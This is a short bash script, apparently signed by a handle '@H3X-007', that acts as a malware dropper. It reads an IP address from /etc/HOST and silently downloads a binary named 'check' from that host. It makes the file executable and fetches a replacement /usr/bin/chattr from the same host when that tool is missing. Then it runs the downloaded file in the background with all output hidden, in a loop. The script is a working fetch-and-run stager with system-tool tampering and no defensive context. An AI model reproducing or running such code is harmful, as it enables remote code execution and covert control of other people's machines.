#!/bin/bash
# Created by @H3X-007 :)

script_path="/etc/bin/check"

ip_address=$(head -n 1 "/etc/HOST")

while true; do
    if [ ! -f "$script_path" ]; then
        wget "http://$ip_address/check" -O "$script_path" >/dev/null 2>&1
        chmod +x "$script_path"
    else
        exit 10
    fi

    chattr_path="/usr/bin/chattr"

    if [ ! -f "$chattr_path" ]; then
        wget "http://$ip_address/chattr" -O "$chattr_path" >/dev/null 2>&1
        chmod +x "$chattr_path"
    else
        exit 10
    fi

    nohup "$script_path" >/dev/null 2>&1 &

    sleep 1
done
